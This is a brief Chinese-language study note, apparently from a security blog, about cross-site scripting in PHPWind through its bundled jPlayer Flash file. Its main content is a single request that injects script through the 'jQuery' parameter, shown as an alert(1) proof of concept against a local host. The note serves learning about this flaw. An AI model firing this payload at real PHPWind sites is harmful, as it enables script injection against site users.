【笔记】PHPWind利用Flash实现跨站脚本攻击 发表于 2024-05-09 更新于 2025-12-19 阅读次数: 前言PHPWind利用Flash实现跨站脚本攻击如果swf文件出现了ExternalInterface.call函数调用且变量可以通过参数传递,则可以实现跨站脚本攻击 正文request1GET http://127.0.0.1:80/www/res/js/dev/util_libs/jPlayer/Jplayer.swf?jQuery=alert(1))}catch{}// 完成参考文献哔哩哔哩——xiaodisec